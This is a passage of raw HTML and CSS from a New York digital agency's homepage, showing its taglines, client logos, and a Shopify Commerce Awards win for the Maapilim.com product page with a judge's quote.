.l-header.pos_fixed~.l-main .l-section.height_full:nth-of-type(2){min-height:100vh}.admin-bar.header_inpos_below .l-header.pos_fixed~.l-main .l-section.height_full:nth-of-type(2){min-height:calc(100vh - 32px)}.header_inpos_bottom .l-header.pos_fixed:not(.sticky) .w-cart-dropdown,.header_inpos_bottom .l-header.pos_fixed:not(.sticky) .w-nav.type_desktop .w-nav-list.level_2{bottom:100%;transform-origin:0 100%}.header_inpos_bottom .l-header.pos_fixed:not(.sticky) .w-nav.type_mobile.m_layout_dropdown .w-nav-list.level_1{top:auto;bottom:100%;box-shadow:0 -3px 3px rgba(0,0,0,0.1)}.header_inpos_bottom .l-header.pos_fixed:not(.sticky) .w-nav.type_desktop .w-nav-list.level_3,.header_inpos_bottom .l-header.pos_fixed:not(.sticky) .w-nav.type_desktop .w-nav-list.level_4{top:auto;bottom:0;transform-origin:0 100%}}@media (min-width:1200px) and (max-width:912px){.hidden_for_tablets{display:none !important}.l-subheader.at_top{display:none}.l-subheader.at_bottom{display:none}.l-header{position:relative;z-index:111;width:100%}.l-subheader{margin:0 auto}.l-subheader.width_full{padding-left:1.5rem;padding-right:1.5rem}.l-subheader-h{display:flex;align-items:center;position:relative;margin:0 auto;height:inherit}.w-header-show{display:none}.l-header.pos_fixed{position:fixed;left:0}.l-header.pos_fixed:not(.notransition) .l-subheader{transition-property:transform, background-color, box-shadow, line-height, height;transition-duration:0.3s;transition-timing-function:cubic-bezier(.78,.13,.15,.86)}.l-header.bg_transparent:not(.sticky) .l-subheader{box-shadow:none !important;background-image:none;background-color:transparent}.l-header.bg_transparent~.l-main .l-section.width_full.height_auto:first-child{padding-top:0 !important;padding-bottom:0 !important}.l-header.pos_static.bg_transparent{position:absolute;left:0}.l-subheader.width_full .l-subheader-h{max-width:none !important}.header_inpos_above .l-header.pos_fixed{overflow:hidden;transition:transform 0.3s;transform:translate3d(0,-100%,0)}.header_inpos_above .l-header.pos_fixed.sticky{overflow:visible;transform:none}.header_inpos_above .l-header.pos_fixed~.l-section,.header_inpos_above .l-header.pos_fixed~.l-main,.header_inpos_above .l-header.pos_fixed~.l-main .l-section:first-child{padding-top:0 !important}.l-header.shadow_thin .l-subheader.at_middle,.l-header.shadow_thin .l-subheader.at_bottom,.l-header.shadow_none.sticky .l-subheader.at_middle,.l-header.shadow_none.sticky .l-subheader.at_bottom{box-shadow:0 1px 0 rgba(0,0,0,0.08)}.l-header.shadow_wide .l-subheader.at_middle,.l-header.shadow_wide .l-subheader.at_bottom{box-shadow:0 3px 5px -1px rgba(0,0,0,0.1), 0 2px 1px -1px rgba(0,0,0,0.05)}.header_inpos_bottom .l-header.pos_fixed:not(.sticky) .w-dropdown-list{top:auto;bottom:-0.4em;padding-top:0.4em;padding-bottom:2.4em}.l-subheader-cell>.w-cart{margin-left:0;margin-right:0}.l-subheader.at_top{line-height:36;height:36}.l-header.sticky .l-subheader.at_top{line-height:36;height:36}.l-subheader.at_middle{line-height:80;height:80}.l-header.sticky .l-subheader.at_middle{line-height:50;height:50}.l-subheader.at_bottom{line-height:50;height:50}.l-header.sticky .l-subheader.at_bottom{line-height:50;height:50}.l-header.pos_fixed~.l-section:first-of-type,.sidebar_left .l-header.pos_fixed + .l-main,.sidebar_right .l-header.pos_fixed + .l-main,.sidebar_none .l-header.pos_fixed + .l-main .l-section:first-of-type,.sidebar_none .l-header.pos_fixed + .l-main .l-section-gap:nth-child(2),.l-header.pos_static.bg_transparent~.l-section:first-of-type,.sidebar_left .l-header.pos_static.bg_transparent + .l-main,.sidebar_right .l-header.pos_static.bg_transparent + .l-main,.sidebar_none .l-header.pos_static.bg_transparent + .l-main .l-section:first-of-type{padding-top:80px}.l-header.pos_static.bg_solid + .l-main .l-section.preview_trendy .w-blogpost-preview{top:-80px}.l-header.pos_fixed~.l-main .l-section.sticky{top:50px}.l-header.pos_fixed.sticky + .l-section.type_sticky,.sidebar_none .l-header.pos_fixed.sticky + .l-main .l-section.type_sticky:first-of-type{padding-top:50px}}@media (max-width:1199px){.hidden_for_mobiles{display:none !important}.l-subheader.at_top{display:none}.l-subheader.at_bottom{display:none}.l-header{position:relative;z-index:111;width:100%}.l-subheader{margin:0 auto}.l-subheader.width_full{padding-left:1.5rem;padding-right:1.5rem}.l-subheader-h{display:flex;align-items:center;position:relative;margin:0 auto;height:inherit}.w-header-show{display:none}.l-header.pos_fixed{position:fixed;left:0}.l-header.pos_fixed:not(.notransition) .l-subheader{transition-property:transform, background-color, box-shadow, line-height, height;transition-duration:0.3s;transition-timing-function:cubic-bezier(.78,.13,.15,.86)}.l-header.bg_transparent:not(.sticky) .l-subheader{box-shadow:none !important;background-image:none;background-color:transparent}.l-header.bg_transparent~.l-main .l-section.width_full.height_auto:first-child{padding-top:0 !important;padding-bottom:0 !important}.l-header.pos_static.bg_transparent{position:absolute;left:0}.l-subheader.width_full .l-subheader-h{max-width:none !important}.header_inpos_above .l-header.pos_fixed{overflow:hidden;transition:transform 0.3s;transform:translate3d(0,-100%,0)}.header_inpos_above .l-header.pos_fixed.sticky{overflow:visible;transform:none}.header_inpos_above .l-header.pos_fixed~.l-section,.header_inpos_above .l-header.pos_fixed~.l-main,.header_inpos_above .l-header.pos_fixed~.l-main .l-section:first-child{padding-top:0 !important}.l-header.shadow_thin .l-subheader.at_middle,.l-header.shadow_thin .l-subheader.at_bottom,.l-header.shadow_none.sticky .l-subheader.at_middle,.l-header.shadow_none.sticky .l-subheader.at_bottom{box-shadow:0 1px 0 rgba(0,0,0,0.08)}.l-header.shadow_wide .l-subheader.at_middle,.l-header.shadow_wide .l-subheader.at_bottom{box-shadow:0 3px 5px -1px rgba(0,0,0,0.1), 0 2px 1px -1px rgba(0,0,0,0.05)}.header_inpos_bottom .l-header.pos_fixed:not(.sticky) .w-dropdown-list{top:auto;bottom:-0.4em;padding-top:0.4em;padding-bottom:2.4em}.l-subheader-cell>.w-cart{margin-left:0;margin-right:0}.l-subheader.at_top{line-height:36;height:36}.l-header.sticky .l-subheader.at_top{line-height:36;height:36}.l-subheader.at_middle{line-height:50;height:50}.l-header.sticky .l-subheader.at_middle{line-height:50;height:50}.l-subheader.at_bottom{line-height:50;height:50}.l-header.sticky .l-subheader.at_bottom{line-height:50;height:50}.l-header.pos_fixed~.l-section:first-of-type,.sidebar_left .l-header.pos_fixed + .l-main,.sidebar_right .l-header.pos_fixed + .l-main,.sidebar_none .l-header.pos_fixed + .l-main .l-section:first-of-type,.sidebar_none .l-header.pos_fixed + .l-main .l-section-gap:nth-child(2),.l-header.pos_static.bg_transparent~.l-section:first-of-type,.sidebar_left .l-header.pos_static.bg_transparent + .l-main,.sidebar_right .l-header.pos_static.bg_transparent + .l-main,.sidebar_none .l-header.pos_static.bg_transparent + .l-main .l-section:first-of-type{padding-top:50px}.l-header.pos_static.bg_solid + .l-main .l-section.preview_trendy .w-blogpost-preview{top:-50px}.l-header.pos_fixed~.l-main .l-section.sticky{top:50px}.l-header.pos_fixed.sticky + .l-section.type_sticky,.sidebar_none .l-header.pos_fixed.sticky + .l-main .l-section.type_sticky:first-of-type{padding-top:50px}}@media (min-width:913px){.ush_image_1{height:60px}.l-header.sticky .ush_image_1{height:35px}}@media (min-width:1200px) and (max-width:912px){.ush_image_1{height:50px}.l-header.sticky .ush_image_1{height:35px}}@media (max-width:1199px){.ush_image_1{height:40px}.l-header.sticky .ush_image_1{height:30px}}.header_hor .ush_menu_1.type_desktop .w-nav-list.level_1>.menu-item>a{padding-left:80px;padding-right:80px}.header_ver .ush_menu_1.type_desktop .w-nav-list.level_1>.menu-item>a{padding-top:80px;padding-bottom:80px}.ush_menu_1{font-family:'Montserrat', sans-serif;font-weight:400}.ush_menu_1.type_desktop .menu-item-has-children .w-nav-anchor.level_1>.w-nav-arrow{display:inline-block}.ush_menu_1.type_desktop .w-nav-list>.menu-item.level_1{font-size:62}.ush_menu_1.type_desktop .w-nav-list>.menu-item:not(.level_1){font-size:62}.ush_menu_1.type_desktop{position:relative}.ush_menu_1.type_mobile .w-nav-anchor.level_1{font-size:62}.ush_menu_1.type_mobile .w-nav-anchor:not(.level_1){font-size:62}@media (min-width:913px){.ush_menu_1 .w-nav-icon{font-size:62}}@media (min-width:1200px) and (max-width:912px){.ush_menu_1 .w-nav-icon{font-size:62}}@media (max-width:1199px){.ush_menu_1 .w-nav-icon{font-size:62}}@media screen and (max-width:1999px){.w-nav.ush_menu_1>.w-nav-list.level_1{display:none}.ush_menu_1 .w-nav-control{display:block}}@media (min-width:913px){.ush_menu_1{margin-right:20px!important}}@media (min-width:1200px) and (max-width:912px){.ush_menu_1{margin-right:10px!important}}</style> <style id="us-custom-css">.wpb_text_column:not(:last-child){margin-bottom:1.5rem}.w-nav-close{top:10px;right:20px}.menu-item-7932 .w-nav-title{font-size:16px}.menu-item-7932 .w-nav-anchor{padding:1rem 0.7rem 0.2rem 0.7rem !important}.menu-item-7933 .w-nav-title{font-size:16px}.menu-item-7933 .w-nav-anchor{padding:0.2rem 0.7rem !important}.menu-item-7934 .w-nav-title{font-size:16px}.menu-item-7934 .w-nav-anchor{padding:0.2rem 0.7rem !important}.menu-item-7935 .w-nav-title{font-size:16px}.menu-item-7935 .w-nav-anchor{padding:0.2rem 0.7rem !important}.w-pricing-item-header{background-color:#bbbbbb}.service-header{height:70vh}.work-link img,img.work-link{filter:grayscale(0%);transition:.2s ease}.work-link img:hover,img.work-link{filter:grayscale(75%)}h1, h2, h3, h4, h5, h6, p{word-wrap:normal}@media (max-width:767px){#award-text{text-align:center}.foot-link{font-size:22px}h1.what-head, .what-head h1{-webkit-text-stroke:1px black!important}h1.phant-head, .phant-head h1{-webkit-text-stroke:1px !important}}@media (min-width:767px){.desaturate img,img.desaturate{-webkit-transition:0.5s -webkit-filter ease;-moz-transition:0.5s -moz-filter ease;-moz-transition:0.5s filter ease;-ms-transition:0.5s -ms-filter ease;-o-transition:0.5s -o-filter ease;transition:0.5s filter ease;-webkit-filter:grayscale(100%);filter:grayscale(100%)}.desaturate img:hover,img.desaturate:hover{-webkit-filter:none;filter:none}}path .st1, .st2{stroke-dasharray:800}path:nth-child(2){animation:draw1 5s linear 1}path:nth-child(3){animation:draw2 5s linear 1}path:nth-child(4){animation:draw3 5s linear 1}path:nth-child(5){animation:draw4 5s linear 1}@keyframes draw1{from{stroke-dashoffset:800}to{stroke-dashoffset:0}}@keyframes draw2{from{stroke-dashoffset:800}to{stroke-dashoffset:0}}@keyframes draw3{from{stroke-dashoffset:-350}to{stroke-dashoffset:450}}@keyframes draw4{from{stroke-dashoffset:-300}to{stroke-dashoffset:500}}</style> </head> <body class="home page-template-default page page-id-7454 l-body Impreza_5.6.1 HB_2.3 header_hor header_inpos_top rounded_none state_default wpb-js-composer js-comp-ver-5.6 vc_responsive" itemscope itemtype="https://schema.org/WebPage"> <div class="l-canvas sidebar_none type_wide"> <header class="l-header pos_fixed bg_transparent shadow_none id_7211" itemscope itemtype="https://schema.org/WPHeader"><div class="l-subheader at_middle width_full"><div class="l-subheader-h"><div class="l-subheader-cell at_left"><div class="w-image ush_image_1 header-logo with_transparent"><a class="w-image-h" href="https://tvp.nyc/"><img width="89" height="69" src="https://tvp.nyc/wp-content/uploads/2019/04/tvp-nyc_logo_stacked_black-01.png" class="for_default" alt="" /><img width="89" height="69" src="https://tvp.nyc/wp-content/uploads/2019/04/tvp-nyc_logo_stacked_white-01.png" class="for_transparent" alt="" /></a></div></div><div class="l-subheader-cell at_center"></div><div class="l-subheader-cell at_right"><nav class="w-nav ush_menu_1 type_desktop dropdown_opacity m_align_right m_layout_fullscreen m_effect_aft" itemscope itemtype="https://schema.org/SiteNavigationElement"><a class="w-nav-control" href="javascript:void(0);" aria-label="Menu"><div class="w-nav-icon"><i></i></div><span>Menu</span></a><ul class="w-nav-list level_1 hide_for_mobiles hover_underline"><li id="menu-item-7544" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-7454 current_page_item w-nav-item level_1 menu-item-7544"><a class="w-nav-anchor level_1" href="https://tvp.nyc/"><span class="w-nav-title">Home</span><span class="w-nav-arrow"></span></a></li><li id="menu-item-7215" class="menu-item menu-item-type-post_type menu-item-object-page w-nav-item level_1 menu-item-7215"><a class="w-nav-anchor level_1" href="https://tvp.nyc/what-we-do/"><span class="w-nav-title">What We Do</span><span class="w-nav-arrow"></span></a></li><li id="menu-item-7931" class="menu-item menu-item-type-post_type menu-item-object-page w-nav-item level_1 menu-item-7931"><a class="w-nav-anchor level_1" href="https://tvp.nyc/contact/"><span class="w-nav-title">Contact</span><span class="w-nav-arrow"></span></a></li><li id="menu-item-7932" class="menu-item menu-item-type-custom menu-item-object-custom w-nav-item level_1 menu-item-7932"><a class="w-nav-anchor level_1" href="https://www.facebook.com/tvpnyc"><span class="w-nav-title">Facebook</span><span class="w-nav-arrow"></span></a></li><li id="menu-item-7933" class="menu-item menu-item-type-custom menu-item-object-custom w-nav-item level_1 menu-item-7933"><a class="w-nav-anchor level_1" href="https://www.instagram.com/tvp_nyc/"><span class="w-nav-title">Instagram</span><span class="w-nav-arrow"></span></a></li><li id="menu-item-7934" class="menu-item menu-item-type-custom menu-item-object-custom w-nav-item level_1 menu-item-7934"><a class="w-nav-anchor level_1" href="https://twitter.com/tvpnyc"><span class="w-nav-title">Twitter</span><span class="w-nav-arrow"></span></a></li><li id="menu-item-7935" class="menu-item menu-item-type-custom menu-item-object-custom w-nav-item level_1 menu-item-7935"><a class="w-nav-anchor level_1" href="https://www.linkedin.com/company/the-vanity-project/"><span class="w-nav-title">LinkedIn</span><span class="w-nav-arrow"></span></a></li><li class="w-nav-close"></li></ul><div class="w-nav-options hidden" onclick='return {&quot;mobileWidth&quot;:2000,&quot;mobileBehavior&quot;:1}'></div></nav></div></div></div><div class="l-subheader for_hidden hidden"></div></header> <div class="l-main"> <div class="l-main-h i-cf"> <main class="l-content" itemprop="mainContentOfPage"> <section class="l-section wpb_row height_full valign_center"><div class="l-section-h i-cf" style="padding-top: -60px !important;"><div class="g-cols vc_row type_default valign_top"><div class="vc_col-sm-2/5 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"></div></div></div><div class="vc_col-sm-1/5 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="g-cols wpb_row type_default valign_middle vc_inner "><div class="vc_col-sm-12 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center animate_fade style-svg"><div class="w-image-h"><img width="300" src="https://tvp.nyc/wp-content/uploads/2019/04/animation_logo_test.svg" class="attachment-medium size-medium" alt="" /></div></div></div></div></div></div></div></div></div><div class="vc_col-sm-2/5 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"></div></div></div></div></div></section><!-- Row Backgrounds --><div class="upb_color" data-bg-override="0" data-bg-color="#0a0a0a" data-fadeout="" data-fadeout-percentage="30" data-parallax-content="parallax_content_value" data-parallax-content-sense="10" data-row-effect-mobile-disable="true" data-img-parallax-mobile-disable="true" data-rtl="false" data-custom-vc-row="" data-vc="5.6" data-is_old_vc="" data-theme-support="" data-overlay="false" data-overlay-color="" data-overlay-pattern="" data-overlay-pattern-opacity="" data-overlay-pattern-size="" ></div><section class="l-section wpb_row height_medium" style="margin-top: 40px !important;margin-bottom: 40px !important;"><div class="l-section-h i-cf"><div class="g-cols vc_row type_default valign_middle"><div class="vc_col-sm-12 wpb_column vc_column_container animate_fade d2"><div class="vc_column-inner color_custom" style="color:#0a0a0a;"><div class="wpb_wrapper"><div class="g-cols wpb_row type_default valign_top vc_inner vc_custom_1546627736970"><div class="vc_col-sm-12 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"> <div class="wpb_text_column "> <div class="wpb_wrapper"> <h1 style="line-height: 95%; letter-spacing: .02em;">POWERED BY PEOPLE.</h1> </div> </div> </div></div></div></div><div class="g-cols wpb_row type_default valign_top vc_inner vc_custom_1546627746242"><div class="vc_col-sm-12 wpb_column vc_column_container animate_fade d3"><div class="vc_column-inner"><div class="wpb_wrapper"> <div class="wpb_text_column "> <div class="wpb_wrapper"> <h1 style="line-height: 95%; letter-spacing: .02em;">ACCELERATED BY TECHNOLOGY.</h1> </div> </div> </div></div></div></div><div class="g-cols wpb_row type_default valign_top vc_inner "><div class="vc_col-sm-12 wpb_column vc_column_container animate_fade d4"><div class="vc_column-inner"><div class="wpb_wrapper"> <div class="wpb_text_column "> <div class="wpb_wrapper"> <h1 style="line-height: 95%; letter-spacing: .02em;">THE BEST OF BOTH WORLDS.</h1> </div> </div> </div></div></div></div></div></div></div></div></div></section><!-- Row Backgrounds --><div class="upb_color" data-bg-override="0" data-bg-color="#ffffff" data-fadeout="" data-fadeout-percentage="30" data-parallax-content="" data-parallax-content-sense="30" data-row-effect-mobile-disable="true" data-img-parallax-mobile-disable="true" data-rtl="false" data-custom-vc-row="" data-vc="5.6" data-is_old_vc="" data-theme-support="" data-overlay="false" data-overlay-color="" data-overlay-pattern="" data-overlay-pattern-opacity="" data-overlay-pattern-size="" ></div><section class="l-section wpb_row height_full valign_center" style="margin-top: 40px !important;margin-bottom: 40px !important;"><div class="l-section-h i-cf"><div class="g-cols vc_row type_default valign_middle"><div class="vc_col-sm-12 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="g-cols wpb_row type_default valign_middle vc_inner "><div class="vc_col-sm-12 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"> <div class="wpb_text_column "> <div class="wpb_wrapper"> <h2>We work with some of the biggest companies in the space and we&#8217;re just getting started.</h2> </div> </div> </div></div></div></div></div></div></div></div></div></section><section class="l-section wpb_row height_medium"><div class="l-section-h i-cf"><div class="g-cols vc_row type_default valign_middle"><div class="vc_col-sm-12 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"> <div class="wpb_text_column "> <div class="wpb_wrapper"> <h6 style="font-family: 'Raleway', sans-serif; font-weight: 600; font-size: 16px;">Some of our clients:</h6> </div> </div> <div class="g-cols wpb_row type_default valign_top vc_inner "><div class="vc_col-sm-2 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container animate_fade d2"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center vc_custom_1544720194692 desaturate"><div class="w-image-h"><img width="200" height="100" src="https://tvp.nyc/wp-content/uploads/2018/12/globalcitizen.png" class="attachment-full size-full" alt="" /></div></div></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container animate_fade d2"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center vc_custom_1544720208597 desaturate"><div class="w-image-h"><img width="200" height="100" src="https://tvp.nyc/wp-content/uploads/2018/12/tr.png" class="attachment-full size-full" alt="" /></div></div></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container animate_fade d2"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center vc_custom_1544720221579 desaturate"><div class="w-image-h"><img width="200" height="100" src="https://tvp.nyc/wp-content/uploads/2018/12/tpg.png" class="attachment-full size-full" alt="" /></div></div></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container animate_fade d2"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center vc_custom_1544720234849 desaturate"><div class="w-image-h"><img width="200" height="100" src="https://tvp.nyc/wp-content/uploads/2018/12/aarp.png" class="attachment-full size-full" alt="" /></div></div></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"></div></div></div></div><div class="g-cols wpb_row type_default valign_top vc_inner "><div class="vc_col-sm-2 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container animate_fade d2"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center vc_custom_1544720246355 desaturate"><div class="w-image-h"><img width="200" height="100" src="https://tvp.nyc/wp-content/uploads/2018/12/entrepreneur.png" class="attachment-full size-full" alt="" /></div></div></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container animate_fade d2"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center vc_custom_1544720261500 desaturate"><div class="w-image-h"><img width="200" height="100" src="https://tvp.nyc/wp-content/uploads/2018/12/mtsinai.png" class="attachment-full size-full" alt="" /></div></div></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container animate_fade d2"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center vc_custom_1544720281850 desaturate"><div class="w-image-h"><img width="200" height="100" src="https://tvp.nyc/wp-content/uploads/2018/12/otherhalf.png" class="attachment-full size-full" alt="" /></div></div></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container animate_fade d2"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center vc_custom_1544720296609 desaturate"><div class="w-image-h"><img width="200" height="100" src="https://tvp.nyc/wp-content/uploads/2018/12/aclu.png" class="attachment-full size-full" alt="" /></div></div></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"></div></div></div></div><div class="g-cols wpb_row type_default valign_top vc_inner "><div class="vc_col-sm-2 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container animate_fade d2"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center vc_custom_1544720309964 desaturate"><div class="w-image-h"><img width="200" height="100" src="https://tvp.nyc/wp-content/uploads/2018/12/andpizza.png" class="attachment-full size-full" alt="" /></div></div></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container animate_fade d2"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center vc_custom_1544720325857 desaturate"><div class="w-image-h"><img width="200" height="100" src="https://tvp.nyc/wp-content/uploads/2018/12/justworks.png" class="attachment-full size-full" alt="" /></div></div></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container animate_fade d2"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center vc_custom_1552670507619 desaturate"><div class="w-image-h"><img width="200" height="100" src="https://tvp.nyc/wp-content/uploads/2019/03/mighty.png" class="attachment-full size-full" alt="" /></div></div></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container animate_fade d2"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center vc_custom_1553184510424 desaturate"><div class="w-image-h"><img width="200" height="100" src="https://tvp.nyc/wp-content/uploads/2019/03/state_bags.png" class="attachment-full size-full" alt="" /></div></div></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"></div></div></div></div><div class="g-cols wpb_row type_default valign_top vc_inner "><div class="vc_col-sm-2 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container animate_fade d2"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center vc_custom_1544720362104 desaturate"><div class="w-image-h"><img width="200" height="100" src="https://tvp.nyc/wp-content/uploads/2018/12/prizeo.png" class="attachment-full size-full" alt="" /></div></div></div></div></div><div class="vc_col-sm-4 wpb_column vc_column_container animate_fade d2"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center vc_custom_1544720379553 desaturate"><div class="w-image-h"><img width="400" height="100" src="https://tvp.nyc/wp-content/uploads/2018/12/chantecaille.png" class="attachment-full size-full" alt="" srcset="https://tvp.nyc/wp-content/uploads/2018/12/chantecaille.png 400w, https://tvp.nyc/wp-content/uploads/2018/12/chantecaille-300x75.png 300w" sizes="(max-width: 400px) 100vw, 400px" /></div></div></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container animate_fade d2"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center vc_custom_1544720392032 desaturate"><div class="w-image-h"><img width="200" height="100" src="https://tvp.nyc/wp-content/uploads/2018/12/weatherman-1.png" class="attachment-full size-full" alt="" /></div></div></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"></div></div></div></div></div></div></div></div></div></section><section class="l-section wpb_row height_full valign_center"><div class="l-section-h i-cf"><div class="g-cols vc_row type_default valign_middle"><div class="vc_col-sm-2 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"></div></div></div><div class="vc_col-sm-8 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="g-cols wpb_row type_default valign_middle vc_inner "><div class="vc_col-sm-3 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center"><div class="w-image-h"><img width="499" height="207" src="https://tvp.nyc/wp-content/uploads/2018/12/shopify_commerce_award.png" class="attachment-full size-full" alt="" srcset="https://tvp.nyc/wp-content/uploads/2018/12/shopify_commerce_award.png 499w, https://tvp.nyc/wp-content/uploads/2018/12/shopify_commerce_award-300x124.png 300w" sizes="(max-width: 499px) 100vw, 499px" /></div></div></div></div></div><div class="vc_col-sm-9 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"> <div class="wpb_text_column " id="award-text"> <div class="wpb_wrapper"> <h3 style="color: white;">WE WON BEST PRODUCT PAGE AT<br /> SHOPIFY’S COMMERCE AWARDS.</h3> </div> </div> </div></div></div></div></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"></div></div></div></div></div></section><!-- Row Backgrounds --><div class="upb_color" data-bg-override="0" data-bg-color="#0a0a0a" data-fadeout="" data-fadeout-percentage="30" data-parallax-content="" data-parallax-content-sense="30" data-row-effect-mobile-disable="true" data-img-parallax-mobile-disable="true" data-rtl="false" data-custom-vc-row="" data-vc="5.6" data-is_old_vc="" data-theme-support="" data-overlay="false" data-overlay-color="" data-overlay-pattern="" data-overlay-pattern-opacity="" data-overlay-pattern-size="" ></div><section class="l-section wpb_row height_medium"><div class="l-section-h i-cf"><div class="g-cols vc_row type_default valign_top"><div class="vc_col-sm-12 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"> <div class="wpb_text_column "> <div class="wpb_wrapper"> <p style="text-align: center; font-family: 'Raleway', sans-serif; font-weight: 600; font-size: 14px;">Best Product Page &#8211; Maapilim.com</p> </div> </div> <div class="w-image align_center"><div class="w-image-h"><img width="1799" height="750" src="https://tvp.nyc/wp-content/uploads/2018/04/maapilim-homepage2.png" class="attachment-full size-full" alt="" srcset="https://tvp.nyc/wp-content/uploads/2018/04/maapilim-homepage2.png 1799w, https://tvp.nyc/wp-content/uploads/2018/04/maapilim-homepage2-300x125.png 300w, https://tvp.nyc/wp-content/uploads/2018/04/maapilim-homepage2-768x320.png 768w, https://tvp.nyc/wp-content/uploads/2018/04/maapilim-homepage2-1024x427.png 1024w, https://tvp.nyc/wp-content/uploads/2018/04/maapilim-homepage2-600x250.png 600w" sizes="(max-width: 1799px) 100vw, 1799px" /></div></div></div></div></div></div></div></section><!-- Row Backgrounds --><div class="upb_color" data-bg-override="0" data-bg-color="#ffffff" data-fadeout="" data-fadeout-percentage="30" data-parallax-content="" data-parallax-content-sense="30" data-row-effect-mobile-disable="true" data-img-parallax-mobile-disable="true" data-rtl="false" data-custom-vc-row="" data-vc="5.6" data-is_old_vc="" data-theme-support="" data-overlay="false" data-overlay-color="" data-overlay-pattern="" data-overlay-pattern-opacity="" data-overlay-pattern-size="" ></div><section class="l-section wpb_row height_full valign_center"><div class="l-section-h i-cf"><div class="g-cols vc_row type_default valign_bottom"><div class="vc_col-sm-12 wpb_column vc_column_container"><div class="vc_column-inner vc_custom_1544725044009"><div class="wpb_wrapper"> <div class="wpb_text_column "> <div class="wpb_wrapper"> <h6 style="color: white; font-family: 'Montserrat', sans-serif; font-weight: 500; font-size: 14px;">What the judges said:</h6> </div> </div> <div class="g-cols wpb_row type_default valign_bottom vc_inner vc_custom_1544725012390"><div class="vc_col-sm-2 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"></div></div></div><div class="vc_col-sm-2 vc_hidden-xs wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center"><div class="w-image-h"><img width="226" height="300" src="https://tvp.nyc/wp-content/uploads/2018/12/shopify-logo-226x300.png" class="attachment-medium size-medium" alt="" srcset="https://tvp.nyc/wp-content/uploads/2018/12/shopify-logo-226x300.png 226w, https://tvp.nyc/wp-content/uploads/2018/12/shopify-logo.png 300w" sizes="(max-width: 226px) 100vw, 226px" /></div></div></div></div></div><div class="vc_col-sm-6 wpb_column vc_column_container"><div class="vc_column-inner color_custom" style="color:#ffffff;"><div class="wpb_wrapper"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:24px;"><q>This product page is great in its simplicity. They remembered that the point of a product page is to sell the product! I also appreciate the integration of the ingredient provenance on a map. It creates original content for each product</q></div><div class="cl-review-author" style="font-size:18px;"><span class="cl-review-author-name">Cynthia Savard Saucier</span><span class="cl-review-author-occupation">Director of Design at Shopify</span></div></div></div></div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"></div></div></div></div></div></div></div></div></div></section><!-- Row Backgrounds --><div class="upb_color" data-bg-override="0" data-bg-color="#0a0a0a" data-fadeout="" data-fadeout-percentage="30" data-parallax-content="" data-parallax-content-sense="30" data-row-effect-mobile-disable="true" data-img-parallax-mobile-disable="true" data-rtl="false" data-custom-vc-row="" data-vc="5.6" data-is_old_vc="" data-theme-support="" data-overlay="false" 